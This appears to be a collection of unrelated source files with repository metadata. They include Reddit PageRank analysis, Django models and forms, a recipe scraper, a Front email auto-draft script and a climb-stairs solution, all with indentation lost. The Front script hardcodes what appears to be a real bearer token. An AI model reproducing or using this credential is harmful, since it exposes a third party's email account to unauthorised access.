print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced by percentile."
else:
print "ManipulateTable::"+abndTable.funcGetName()+" was NOT normalized and so the percentile filter is invalid, please indicate to normalize the table."
# Filter on abundance (should go after filter on percentile because the filter on percentile
# needs the full distribution of features in a sample
if args.strFilterAbundance:
dAbundance,iMinSamples = args.strFilterAbundance.split(",")
dAbundance = float(dAbundance)
iMinSamples = int(iMinSamples)
for abndTable in lsTables:
if abndTable.funcIsNormalized():
fResult = abndTable.funcFilterAbundanceByMinValue(dMinAbundance=dAbundance,iMinSamples=iMinSamples)
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced by minimum relative abundance value and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
else:
print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced by percentile."
else:
print "ManipulateTable::"+abndTable.funcGetName()+" was NOT normalized and so the abundance filter is invalid, please indicate to normalize the table."
#if args.dCuttOff:
# print "Standard deviation filtering not completed"
# for abndTable in lsTables:
# abndTable.funcFilterFeatureBySD(dMinSDCuttOff=args.dCuttOff)
# if fResult:
# print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced by standard deviation and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
# else:
# print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced by standard devation."
# Need to normalize again after abundance data filtering given removing features breaks the normalization
# This happends twice because normalization is required to make the abundance data to filter on ;-)
# Normalize if needed
if args.fNormalize:
for abndTable in lsTables:
fResult = abndTable.funcNormalize()
if fResult:
print "ManipulateTable::"+abndTable.funcGetName()+" was normalized after filtering on abundance data."
#Manipulate lineage
if args.fPrefixClades:
for abndTable in lsTables:
fResult = abndTable.funcAddCladePrefixToFeatures()
if fResult:
print "ManipulateTable::Clade Prefix was added to "+abndTable.funcGetName()
else:
print "ManipulateTable::ERROR. Clade Prefix was NOT added to "+abndTable.funcGetName()
# Reduce dimensionality
if args.fDoPCA:
pcaCur = PCA()
for abndTable in lsTables:
# Add data features
# Make data components and add to abundance table
pcaCur.loadData(abndTable,True)
pcaCur.run()
ldVariance = pcaCur.getVariance()
lldComponents = pcaCur.getComponents()
# Make Names
lsNamesData = ["Data_PC"+str((tpleVariance[0]+1))+"_"+re.sub("[\.|-]","_",str(tpleVariance[1])) for tpleVariance in enumerate(ldVariance)]
abndTable.funcAddDataFeature(lsNamesData,lldComponents)
# Add metadata features
# Convert metadata to an input for PCA
dictMetadata = abndTable.funcGetMetadataCopy()
## Remove the metadta id
dictMetadata.pop(abndTable.funcGetIDMetadataName(),None)
lMetadata = []
for lxItem in dictMetadata.values():
# Replace NAs with the Mode
dictFreq = {}
for xItem in lxItem:
if not xItem.strip().lower() in ["na",""]:
dictFreq[xItem] = dictFreq.get(xItem,0)+1
xCurMode = max((v, k) for k, v in dictFreq.iteritems())[1]
lxItem = [xCurMode if xItem.strip().lower() in ["na",""] else xItem.strip() for xItem in lxItem]
## Get only numeric metadata
if sum([ ValidateData.funcIsValidStringFloat(xItem) for xItem in lxItem]) == len(lxItem):
lMetadata.append([float(xItem) for xItem in lxItem])
pcaCur.loadData(np.array(lMetadata).T,False)
pcaCur.run()
ldVariance = pcaCur.getVariance()
lldComponents = pcaCur.getComponents()
# Make Names
lsNamesMetadata = ["Metadata_PC"+str((tpleVariance[0]+1))+"_"+re.sub("[\.|-]","_",str(tpleVariance[1])) for tpleVariance in enumerate(ldVariance)]
# Make metadata components and add to abundance
llsMetadata = [list(npdRow) for npdRow in lldComponents]
abndTable.funcAddMetadataFeature(lsNamesMetadata, llsMetadata)
#Manipulate based on metadata
if args.strStratifyBy:
labndStratifiedTables = []
for abndTable in lsTables:
labndResult = abndTable.funcStratifyByMetadata(strMetadata=args.strStratifyBy)
print "ManipulateTable::"+abndTable.funcGetName()+" was stratified by "+args.strStratifyBy+" in to "+str(len(labndResult))+" tables."
labndStratifiedTables.extend(labndResult)
lsTables = labndStratifiedTables
if len(lsTables) == 1:
lsTables[0].funcWriteToFile(args.strOutFile)
else:
iIndex = 1
for abndManTable in lsTables:
abndManTable.funcWriteToFile(lsPieces[0]+str(iIndex)+lsPieces[1])
iIndex = iIndex + 1
|
[
"rschwager-hsph@localhost"
] |
rschwager-hsph@localhost
|
5f81cab976c891e02f4f7d4c3ecc56b284fbe8a0
|
8ebe7adab3daf5fd739970c9da9456f8f122a941
|
/Data-Science_hw3/hw3/reddit_sparse.py
|
49bd3827d35b8f7e0105b02d9aba1ac28570c7df
|
[] |
no_license
|
tsenggordon/Data-Science
|
f497c999cbe7a03b5209e4b107241f2fd1dbad43
|
78905ae22d54dd6f036f3991a5a9b17b09595954
|
refs/heads/master
| 2021-01-21T13:04:21.158521
| 2016-05-19T14:55:52
| 2016-05-19T14:55:52
| 53,210,559
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,168
|
py
|
import csv
import numpy as np
from collections import defaultdict
from multiprocessing import Pool
import pickle
import os
import networkx as nx
from scipy.sparse import csr_matrix, vstack
FILE = "reddit_sort_200k.csv"
#FILE = "reddit_100000.csv"
#FILE = "reddit_50000.csv"
def build_dict():
post_dict = {}
author_dict = {}
comment_dict = defaultdict(set)
post_author_dict = defaultdict(int)
post_subauthor_dict = defaultdict(set)
post_count = 0
author_count = 0
with open(FILE) as f:
reader = csv.reader(f)
reader.next()
for row in reader:
author, po_id= row[0], row[1]
head, post_id = po_id.split("_")
if post_id not in post_dict:
post_dict[post_id] = post_count
post_count+=1
if author not in author_dict:
author_dict[author] = author_count
author_count+=1
comment_dict[author_dict[author]].add(post_dict[post_id])
if head == "t3": #means it is the top post
post_author_dict[post_dict[post_id]] = author_dict[author]
post_subauthor_dict[post_dict[post_id]].add(author_dict[author])
else:
post_subauthor_dict[post_dict[post_id]].add(author_dict[author])
return post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict
def doWork(x):
edgelist = defaultdict(set)
start_idx, end_idx= x
work = end_idx - start_idx
work_100 = work/100
print "doWork start from", start_idx
part_score = None
for i in xrange(start_idx, end_idx):
#print i, start_idx,work/100
if i % work_100 == 0:
print i ,(i-start_idx+1)/ work_100, "%"
#print i
tmp_score = np.zeros((1,len(author_dict)))
for j in xrange(len(author_dict)):
#if len(comment_dict[i] & comment_dict[j]) >0 and i!= j:
#print float(len(comment_dict[i] & comment_dict[j])) / len(comment_dict[i] | comment_dict[j])
#print len(comment_dict[i] & comment_dict[j]), len(comment_dict[i] | comment_dict[j])
#print comment_dict[i]& comment_dict[i]
tmp_score[0, j] = float(len(comment_dict[i] & comment_dict[j])) / len(comment_dict[i] | comment_dict[j])
if tmp_score[0,j] > 0 and i!= j:
edgelist[i].add(j)
tmp_score_s = csr_matrix(tmp_score)
if part_score is not None:
part_score = vstack([part_score, tmp_score_s])
else:
part_score = tmp_score_s
print edgelist
return edgelist, part_score
def build_diredge_and_pagerank():
dirG = nx.DiGraph()
#print "direction"
#print post_author_dict
#print post_subauthor_dict
totalkey = post_author_dict.keys() + post_subauthor_dict.keys()
for key in totalkey:
if (key not in post_author_dict) or (key not in post_subauthor_dict):
continue
actor1_key = post_author_dict[key]
actor1 = rev_author_dict[actor1_key]
actor2_key_list = post_subauthor_dict[key]
if len(actor2_key_list) == 1:
#print "damn"
continue
for actor_key in actor2_key_list:
#print "cool"
if actor1_key == actor_key:
continue
actor2 = rev_author_dict[actor_key]
#print actor1, actor2
dirG.add_edge(actor1, actor2)
pr = nx.pagerank(dirG)
sort_pr = sorted(pr.keys(), key = lambda x :pr[x], reverse=True)
print sort_pr[:10]
return pr
def pagerank(edgelist):
G = nx.Graph()
for actor1 in edgelist.keys():
for actor2 in edgelist[actor1]:
G.add_edge(rev_author_dict[actor1], rev_author_dict[actor2])
pr = nx.pagerank(G)
sort_pr = sorted(pr.keys(), key = lambda x :pr[x], reverse=True)
print sort_pr[:10]
return pr
def build_rev_dict(target):
rev_dict = {}
for key in target.keys():
rev_dict[target[key]] = key
return rev_dict
def joinDict(dictlist):
totalkey = []
for dictionay in dictlist:
totalkey += dictionay.keys()
totaldict = {}
print totalkey
for key in totalkey:
newSet = set()
for dictionay in dictlist:
newSet = newSet | dictionay[key]
totaldict[key] = newSet
return totaldict
if not os.path.exists("dict.pickle"):
print "building dict"
post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict = build_dict()
rev_author_dict = build_rev_dict(author_dict)
with open("dict.pickle", "w") as f:
pickle.dump( (post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict, rev_author_dict), f)
print "buiding dict: finished"
else:
print "loading dict"
with open("dict.pickle") as f:
post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict, rev_author_dict = pickle.load(f)
print "loading dict:finished"
del post_dict
if not os.path.exists("jacc_score.pickle"):
print "compute jacc_score"
print len(author_dict)
#jacc_score = csr_matrix((len(author_dict),len(author_dict)), dtype = np.float32).tolil()
#jacc_score = np.zeros((len(author_dict), len(author_dict))).astype(np.float32)
print "build pool"
pool = Pool(5)
#edgelist_list, score_list
totallist = pool.map(doWork, [(0,int(len(author_dict)/4) ), \
(int(len(author_dict)/4),int(len(author_dict)/4)*2 ), \
(int(len(author_dict)/4)*2,int(len(author_dict)/4)*3 ), \
(int(len(author_dict)/4)*3,len(author_dict) )])
print "Dict joining"
edgelist_list = []
score_list = []
for edgelist, score in totallist:
edgelist_list.append(edgelist)
score_list.append(score)
edgelist = joinDict(edgelist_list)
jacc_score_s = None
for score in score_list:
if jacc_score_s is not None:
jacc_score_s = vstack(jacc_score_s, score)
else:
jacc_score_s = score
pool.close()
pool.join()
print "transfer to sparse"
print "compute jacc_score:saving pickle"
with open("jacc_score.pickle", "w") as f:
pickle.dump((jacc_score_s,edgelist) , f)
print edgelist
print "compute jacc_score:finished"
else:
print "loading jacc_score"
with open("jacc_score.pickle") as f:
jacc_score, edgelist = pickle.load(f)
#jacc_score = jacc_score_s.todense()
print "loading jacc_score:finished"
'''
for i in xrange(jacc_score.shape[0]):
for j in xrange(jacc_score.shape[1]):
if jacc_score[i,j] >0:
print "great"
'''
print "undirected Pagerank"
pr_un = pagerank(edgelist)
print "directed Pagerank"
pr_dir = build_diredge_and_pagerank()
'''
maxlen = 0
maxset = None
for key in comment_dict.keys():
if len(comment_dict[key])> maxlen:
maxlen =len(comment_dict[key])
maxset = comment_dict[key]
#print comment_dict
print maxlen
print maxset
'''
|
[
"kuoweitseng@gmail.com"
] |
kuoweitseng@gmail.com
|
de4a7a14d2f6fe0113e855fbde0cf5395d6aedca
|
51a80368dff80cb3d01ed19692575564f56da149
|
/services/migrations/0007_auto_20201120_2213.py
|
e1631f54213c7bb3a8411a7c0c7b9e07ee5ee85b
|
[] |
no_license
|
guilhermewebdev/acacia-api
|
44986442c34223fce844fa30ed3623b76fc1e3fb
|
e33b07b024fe15dff16f76e2e2f530365f34dc54
|
refs/heads/master
| 2023-03-30T12:28:14.106408
| 2020-12-14T22:11:19
| 2020-12-14T22:11:19
| 353,794,917
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
# Generated by Django 3.1.3 on 2020-11-20 22:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('services', '0006_auto_20201120_2212'),
]
operations = [
migrations.AlterField(
model_name='job',
name='start_datetime',
field=models.DateTimeField(),
),
]
|
[
"guilherme@localhost"
] |
guilherme@localhost
|
8cddad5babfbce45fa0c363641d48e16b2c96d27
|
a3ae61f362d6b2a50c552660df4a5123840948db
|
/config.py
|
31d12ffa828f9262e7bdd65a249ee68b033d8c1e
|
[] |
no_license
|
Puttipong1234/PYBOTT-TODOLIST-NOTIFY
|
dac2eab8e0575b505658f137c58d667392126aeb
|
ac2c0e03891af4044cad8d809109408bc9197fcc
|
refs/heads/master
| 2022-12-16T02:17:52.700831
| 2020-08-29T08:52:14
| 2020-08-29T08:52:14
| 290,964,480
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 501
|
py
|
import os
spreadsheet_key = os.environ.get('SPREADSHEET_KEY') # setup env variable on heroku
service_account_key_file = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS') # setup env variable on heroku
notify_token = os.environ.get('LINE_NOTIFY_TOKEN') # setup env variable on heroku
SPREADSHEET_LINK = os.environ.get('SPREADSHEET_LINK') # setup env variable on heroku
#ADDING BUILDPACK FOR GOOGLE SHEET IN SETTINGS
#https://github.com/gerywahyunugraha/heroku-google-application-credentials-buildpack
|
[
"Puttipong.lims@gmail.com"
] |
Puttipong.lims@gmail.com
|
00b618cc879d52c09940ddfc10d81501d09b159e
|
8a4c2ae24835d87670e9c9ab4ac32e4c85eeea5a
|
/generate_draft.py
|
60415b3ebad930d4bf2b04bd31921a5ba7ca9d25
|
[] |
no_license
|
szou00/analytics_happydogs
|
5bb5f9c57a24fff62824494456ed309e23eb1350
|
5673c5bf66e296591bd3833e9bcc75df482c48e4
|
refs/heads/main
| 2023-08-10T09:44:33.227764
| 2021-09-06T14:48:59
| 2021-09-06T14:48:59
| 387,914,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,394
|
py
|
"""Automatic Draft Generator
This script uses the Front API to review emails and draft replies with
response templates when necessary.
This script requires that `requests` be installed within the Python
environment you are running this script in.
This file can also be imported as a module and contains the following
functions:
* tag_new_events: tags emails with new activity
* review_tagged_conversations: review tagged emails
* get_canned_response: retrieve a response template
* create_draft: create a draft based on a response template
* add_tag: add a tag to a conversation
* remove_tag: remove a tag from a conversation
* get_comments: retrieve comments from a conversation
* save_current_run_time: save current time to a file
* load_last_run_time: retrieve the last time the program was run
* print_friendly_JSON_object: print JSON object in a friendly format
* main: the main function of the script. here, it tags new events, then it reviews tagged emails.
Warnings:
To be filled
Author: Sharon Zou
"""
import requests
import json
import time
import datetime
import os.path
import socket
AUTO_REVIEWED = "tag_mmo1x"
AUTO_REVIEW_NEEDED = "tag_mmlvp"
BEARER_TOKEN = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzY29wZXMiOlsicHJpdmF0ZToqIl0sImlhdCI6MTYyNjk4MTM5NSwiaXNzIjoiZnJvbnQiLCJzdWIiOiJoYXBweV9kb2dzX255YyIsImp0aSI6IjBiNjJkNWMzYTRmMWExMzQifQ.IPviahR63lerU4f1zJmBZGkDTW1nA3GXy2zr_gGgVPU"
def print_friendly_JSON_object(JSON_object):
"""Prints a reader-friendly, formatted string of a JSON object.
This lets us view events/conversations from Front in a much
friendlier format.
Args:
obj (JSON object): A JSON Object from an API request
Returns:
None
"""
formatted_string = json.dumps(JSON_object, sort_keys=True, indent=4)
print(formatted_string)
def tag_new_events():
"""Tags emails that have new activity with 'AUTO-review-needed'
Every time the program runs, this tracks the new activities (such as comment or
message received) and quickly flags them. We can only look at emails with a certain
tag, so this is really helpful in letting us quickly go through emails that may need
drafts generated.
Args:
None
Returns:
None
"""
# Make API request to retrieve events after last time the program ran
time_of_last_run = (
load_last_run_time().timestamp()
) # if never ran before, it'll start looking at events now, do we want to do that or have it look at ALL events
url = (
"https://api2.frontapp.com/events?q[types]=inbound&q[types]=comment&q[after]="
+ str(
time_of_last_run - 60
) # subtracting one minute to compensate lag on Front's end JUST in case
)
payload = {}
headers = {"Authorization": BEARER_TOKEN}
response = requests.request("GET", url, headers=headers, data=payload)
events = response.json()["_results"]
# For each new event, flag it with a tag
for event in events:
email = event["conversation"]
convo_ID = email["id"]
remove_tag(
convo_ID, AUTO_REVIEWED
) # if the email was marked as AUTO-reviewed, untag it
add_tag(convo_ID, AUTO_REVIEW_NEEDED) # now add AUTO-review-needed tag
print("Flagged:" + email["subject"])
save_current_run_time()
def review_tagged_conversations():
"""Review conversations with 'AUTO-review-needed' tag.
If applicable, drafts will be created for conversations
that need them.
Args:
None
Returns:
None
"""
# Makes API request to obtain all conversations with tag and need to reviewed
url = "https://api2.frontapp.com/conversations/search/tag:" + AUTO_REVIEW_NEEDED
payload = {}
files = []
headers = {"Authorization": BEARER_TOKEN}
response = requests.request("GET", url, headers=headers, data=payload, files=files)
# Obtain the emails that need to be reviewed and possibly create drafts
emails = response.json()["_results"]
for email in emails:
convo_ID = email["id"]
for tag in email["tags"]:
# CREATE DRAFT HERE
if (
tag["name"] == "example-tag"
): # simple example of draft being created based on a tag
create_draft(convo_ID, "rsp_3rd8l")
get_comments(convo_ID) # placeholder
remove_tag(convo_ID, AUTO_REVIEW_NEEDED) # removes AUTO-review-needed tag
add_tag(convo_ID, AUTO_REVIEWED) # adds AUTO-reviewed tag
print("Reviewed:" + email["subject"])
def get_canned_response(template_ID):
"""Retrieves message template.
Helper function for create_draft().
Args:
template_ID (str): The ID of the response template
Returns:
response_template.json() (JSON object): Details of the response template
"""
# Make API request to retrieve message template from Front API based on its ID
url = "https://api2.frontapp.com/responses/" + template_ID
payload = {}
files = []
headers = {"Authorization": BEARER_TOKEN}
response_template = requests.request(
"GET", url, headers=headers, data=payload, files=files
)
return response_template.json()
def create_draft(convo_ID, template_ID):
"""Drafts a reply accordingly using a response template.
Args:
convo_ID (str): ID of the conversation to reply to
template_ID (str): ID of response template
Returns:
None
"""
# Get response template through helper function.
# Make an API request to reply to a conversation with the content in that template
response_template = get_canned_response(template_ID)
url = "https://api2.frontapp.com/conversations/" + convo_ID + "/drafts"
payload = {
"body": response_template["body"],
"subject": response_template["subject"],
"author_id": "tea_188ud", # [needs to change later on]
"channel_id": "cha_14tfp", # [also will need to be changed for team based settings]
}
files = []
headers = {"Authorization": BEARER_TOKEN}
requests.request("POST", url, headers=headers, json=payload, files=files)
def add_tag(convo_ID, tag_ID):
"""Add tag to a conversation.
Args:
convo_ID (str): ID of the conversation
tag_ID (str): ID of the tag to add
Returns:
None
"""
# Make API request
url = "https://api2.frontapp.com/conversations/" + convo_ID + "/tags"
payload = json.dumps({"tag_ids": [tag_ID]})
headers = {"Authorization": BEARER_TOKEN, "Content-Type": "application/json"}
requests.request("POST", url, headers=headers, data=payload)
def remove_tag(convo_ID, tag_ID):
"""Removes tags from a conversation.
Args:
convo_ID (str): ID of the conversation
tag_ID (str): ID of the tag to remove
Returns:
None
"""
# Make API request
url = "https://api2.frontapp.com/conversations/" + convo_ID + "/tags"
payload = json.dumps({"tag_ids": [tag_ID]})
headers = {"Authorization": BEARER_TOKEN, "Content-Type": "application/json"}
requests.request("DELETE", url, headers=headers, data=payload)
def get_comments(convo_ID):
"""Retreives comments from a given conversation.
This is a useful function to help decide which draft template to use.
Args:
convoID (str): ID of the conversation
Returns:
None
"""
# Make API request
url = "https://api2.frontapp.com/conversations/" + convo_ID + "/comments"
payload = {}
headers = {"Authorization": BEARER_TOKEN}
response = requests.request("GET", url, headers=headers, data=payload)
for comment in response.json()["_results"]:
# For each comment in Front, print out its message
print_friendly_JSON_object(comment["body"])
def save_current_run_time():
"""Writes the current time to a file.
Args:
None
Returns:
None
"""
# path = "/Users/szou/Downloads/bu/happydogs/analytics_happydogs/last_time_run" # hard coding this due to CRON, but will remove later
output_file = open("last_time_run", "w")
current_time_string = datetime.datetime.strftime(
datetime.datetime.now(), "%Y-%m-%d %H:%M:%S"
)
output_file.write(current_time_string)
print(current_time_string)
output_file.close()
def load_last_run_time():
"""Retrieves the last time the program was ran from the file.
This helps increase efficiency by bypassing events that were already looked at.
Args:
None
Returns:
None
"""
# path = "/Users/szou/Downloads/bu/happydogs/analytics_happydogs/last_time_run"
if os.path.isfile("last_time_run"): #
# If the file exists
f = open("last_time_run", "r")
last_run_time = datetime.datetime.strptime(f.read(), "%Y-%m-%d %H:%M:%S")
f.close()
return last_run_time
save_current_run_time()
# If file doesn't exist (possible if it's the first run), return current time
return datetime.datetime.now()
def main():
try:
tag_new_events()
print("\n")
review_tagged_conversations()
except socket.error:
print("\nCan't connect to Front :(\n")
exit(1)
if __name__ == "__main__":
main()
|
[
"43053716+szou00@users.noreply.github.com"
] |
43053716+szou00@users.noreply.github.com
|
e3d2b3fd01e3d6198f590fe4025c072b285bccb5
|
64b731c4385be883e296f2347a4fb8fb3dcacee2
|
/main/forms.py
|
ef7c3301c407f5eb2298676919449abcbcbf0efa
|
[] |
no_license
|
Couragyn/spruceEditing
|
136310ddf5d427ae6b19d1741bfe2ca6a479f1a4
|
6cc4b4bb2e7c8797f3aeed8bbd254af43d6c2e79
|
refs/heads/master
| 2023-04-16T16:14:43.076781
| 2021-05-04T17:22:01
| 2021-05-04T17:22:01
| 321,816,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,452
|
py
|
from django import forms
from captcha.fields import ReCaptchaField
quote_choices = [
('Academic Papers', 'Academic Papers'),
('Applications & Grants', 'Applications & Grants'),
('Cover letters & Resumes', 'Cover letters & Resumes'),
('Websites & Blogs', 'Websites & Blogs'),
('Newspaper & Magazine Articles', 'Newspaper & Magazine Articles'),
('Short- & Long-form Fiction', 'Short- & Long-form Fiction'),
('Short- & Long-form Creative Nonfiction', 'Short- & Long-form Creative Nonfiction'),
('Beta Reading', 'Beta Reading'),
("Children's Books", "Children's Books"),
("Other", "Other"),
]
class ContactForm(forms.Form):
name = forms.CharField(max_length=80)
email = forms.EmailField()
phone= forms.CharField(max_length=15, required=False)
message = forms.CharField(widget=forms.Textarea)
attachments = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}), required=False)
captcha = ReCaptchaField()
class QuoteForm(forms.Form):
name = forms.CharField(max_length=80)
email = forms.EmailField()
type_of_work = forms.MultipleChoiceField(
required=False,
widget=forms.CheckboxSelectMultiple,
choices=quote_choices,
)
tell_us_about_your_document = forms.CharField(widget=forms.Textarea)
documents = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}), required=False)
captcha = ReCaptchaField()
|
[
"couragyn@gmail.com"
] |
couragyn@gmail.com
|
0113b4bc7587a885d3b38bcecbc777be4442adbd
|
f55a00d30e67c4eea0b425162140207984f3f9df
|
/app/demo/models.py
|
2b796e3a7403b16f4f612ee41e792bed14ac1c23
|
[] |
no_license
|
andynguyenm/django-rest-api-sample
|
bbb89fa297f0e927eabe1cb0c0d9708ddae8dd48
|
746c1d03d5dc3c8488d64e5c01e23ce81fa257fd
|
refs/heads/develop
| 2022-12-22T13:10:07.513141
| 2017-10-06T09:58:05
| 2017-10-06T09:58:05
| 105,881,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,062
|
py
|
from django.db import models
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.dispatch import receiver
# Create your models here.
class BucketList(models.Model):
"""This class represents the bucketlist model."""
name = models.CharField(max_length=255, blank=False, unique=True)
owner = models.ForeignKey('auth.User', # ADD THIS FIELD
related_name='bucketlists',
on_delete=models.CASCADE)
date_created = models.DateTimeField(auto_now_add=True)
date_modified = models.DateTimeField(auto_now=True)
def __str__(self):
"""Return a human readable representation of the model instance."""
return "{}".format(self.name)
# This receiver handles token creation immediately a new user is created.
@receiver(post_save, sender=User)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
|
[
"nghianm@runsystem.net"
] |
nghianm@runsystem.net
|
6a7758880e1dded0ce5cd0f706bd7b963afa65f2
|
ab7a5fdc5375e63e2483ef29dfdb994b687da972
|
/food2fork/__init__.py
|
af3b9e4485adf21d37a6f502eb787c1c48f578ab
|
[
"MIT"
] |
permissive
|
mainrs/MLFoodPairing
|
520d5442597215973d985434d366dddef88f8bd7
|
00d7b5b436328a08e98f0fd02143ed8755331a1e
|
refs/heads/master
| 2023-03-28T10:18:33.752223
| 2018-05-01T06:41:13
| 2018-05-01T06:41:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,736
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
.. module:: food2fork
.. moduleauthor:: Julien Spronck
.. created:: March 2018
'''
import json
import re
import pymongo
import requests
from bs4 import BeautifulSoup
from food2fork.config import FOOD2FORK_API_KEY
import food2fork.ingredient_parser as parser
import food2fork.scrapers as scrapers
__version__ = '1.0'
# Database connection
client = pymongo.MongoClient('mongodb://localhost:27017')
dbfood = client.food2forkDB.food2fork
def scrape_f2f_recipe(url):
'''Scrapes information from recipe web page
Args:
url (str): URL for the recipe
'''
info = {}
response = requests.get(url)
if response.status_code != 200:
return {}
soup = BeautifulSoup(response.text, "lxml")
# Get ingredient list
ingredients = soup.select('li[itemprop="ingredients"]')
# ingredients = [parser.get_ingredient_from_phrase(ingredient.text.strip())
# for ingredient in ingredients]
ingredients = [ingredient.text.strip() for ingredient in ingredients]
if ingredients:
info['raw_ingredients'] = ingredients
# Get social media stats
social = soup.select('div.social-info div.pull-left')
media = {}
for span in social:
match = re.search(r'(\d+)\s+(likes|tweets|plusses|pins|views)',
span.text.lower())
if match:
number = int(match.group(1))
network = match.group(2)
media[network] = number
if media:
info['media'] = media
# Get rank
rank = soup.select('div.rating span')
if rank:
info['social_rank'] = rank[0].text
# Get title
title = soup.select('h1.recipe-title')
if title:
info['title'] = title[0].text
# Get nutritional information
nutrition_rows = soup.select('table.nutrition tr')
nutrition = {}
for row in nutrition_rows:
match = re.search(r'^(\w[\w\s]*)\s+([\d\.]+m?g?)$',
row.text.strip().lower())
if match:
cat = match.group(1)
number = match.group(2)
nutrition[cat] = number
if nutrition:
info['nutrition'] = nutrition
return info
def scrape_original_recipe(url, publisher):
'''Scrapes information from original recipe web page
Args:
url (str): URL for the recipe
'''
scraping_dict = {
"All Recipes": scrapers.AllRecipes,
"101 Cookbooks": scrapers.OneOOneCookbooks,
"Simply Recipes": scrapers.SimplyRecipes,
"Two Peas and Their Pod": scrapers.TwoPeasAndTheirPod,
"The Pioneer Woman": scrapers.ThePioneerWoman,
"Closet Cooking": scrapers.ClosetCooking,
"Cookie and Kate": scrapers.CookieAndKate,
"Jamie Oliver": scrapers.JamieOliver,
"BBC Food": scrapers.BBC,
"BBC Good Food": scrapers.BBCGoodFood,
"Bon Appetit": scrapers.BonAppetit,
"Bunky Cooks": scrapers.BunkyCooks,
"Chow": scrapers.Chow,
"Cookin Canuck": scrapers.CookinCanuck,
"Epicurious": scrapers.Epicurious,
"Fine Dining Lovers": scrapers.FineDiningLovers,
"Healthy Delicious": scrapers.HealthyDelicious,
"My Baking Addiction": scrapers.MyBakingAddiction,
"Naturally Ella": scrapers.NaturallyElla,
"Steamy Kitchen": scrapers.SteamyKitchen,
"Tasty Kitchen": scrapers.TastyKitchen,
}
if publisher not in scraping_dict:
return {}
scraper_cls = scraping_dict[publisher]
scraper = scraper_cls(url)
return scraper.get_all_info()
def add_recipe_to_db(recipe):
'''Adds a recipe to the database
Args:
recipe (dict): dictionary with recipe data
'''
if dbfood.find_one({'recipe_id': recipe['recipe_id']}) is None:
dbfood.insert_one(recipe)
def get_api_data(page=0):
'''Retrieve data from the food2fork API
'''
url = 'http://food2fork.com/api/search'
params = {
'key': FOOD2FORK_API_KEY,
'page': page
}
response = requests.get(url, params=params)
if response.status_code != 200:
print(f'Bad HTTP request ({response.status_code})')
return
for j, recipe in enumerate(response.json()['recipes']):
print(f'Processing {j+1}/30')
if dbfood.find_one({'recipe_id': recipe['recipe_id']}) is not None:
continue
try:
# Add data from food2fork
info1 = scrape_f2f_recipe(recipe['f2f_url'])
for key, val in info1.items():
if key not in recipe:
recipe[key] = val
# Add data from publisher
info2 = scrape_original_recipe(recipe['source_url'],
recipe['publisher'])
for key, val in info2.items():
if key not in recipe:
recipe[key] = val
# Add recipe to database
add_recipe_to_db(recipe)
except (requests.TooManyRedirects, requests.ConnectionError):
continue
if __name__ == '__main__':
# import sys
# def usage(exit_status):
# msg = '\n ... \n'
#
# print(msg)
# sys.exit(exit_status)
#
# import getopt
#
# # parse command line options/arguments
# try:
# opts, args = getopt.getopt(sys.argv[1:],
# 'hd:', ['help', 'dir='])
# except getopt.GetoptError:
# usage(3)
#
# for opt, arg in opts:
# if opt in ('-h', '--help'):
# usage(0)
# if opt in ('-d', '--dir'):
# thedir = arg
pass
|
[
"github@frenetic.be"
] |
github@frenetic.be
|
208520ec6faf7a20465bcdae97a776059c2a8942
|
e811662c890217c77b60aa2e1295dd0f5b2d4591
|
/src/problem_70.py
|
9f79c1c9227baf7b401269ea318c8b52448b42a3
|
[] |
no_license
|
rewonderful/MLC
|
95357f892f8cf76453178875bac99316c7583f84
|
7012572eb192c29327ede821c271ca082316ff2b
|
refs/heads/master
| 2022-05-08T05:24:06.929245
| 2019-09-24T10:35:22
| 2019-09-24T10:35:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,357
|
py
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
def climbStairs(self, n):
"""
算法:动态规划
思路:
爬楼梯的方式只有一次上1步或者一次上2步,所以第i个位置的状态state(i)只与state(i-1),
和state(i-2)有关,例如state(5),第5个台阶不是从第3个台阶来的就是从第4个台阶来的。所以
可以构造状态转移方程state(i) = state(i-1) + state(i-2)。这便是最优子结构,即当前解
依赖于更小规模的解。并且画出来图后可以看到,第4个台阶不是从第3个来的就是从第2个来的,所以存在
重叠子问题,将问题自底向上,解决了小问题后构筑大问题。
程序的出口就是台阶数是1或者2的话就return n
注意:
动规构建问题的时候不一定要像01背包一样有二维表来记录一些值,可能只是一维数组就够了,即记录
更小问题的结果,并且在更小问题的基础上构建更大问题的题解
复杂度分析:
时间:ON,遍历一遍
空间:ON,steps数组的空间
"""
if n == 1 or n == 2:
return n
steps = [0] * (n + 1)
steps[1] = 1
steps[2] = 2
for i in range(3, n + 1):
steps[i] = steps[i - 1] + steps[i - 2]
return steps[-1]
|
[
"457261336@qq.com"
] |
457261336@qq.com
|
22a2116ccdefdc98a9450d2d810f260f5099439d
|
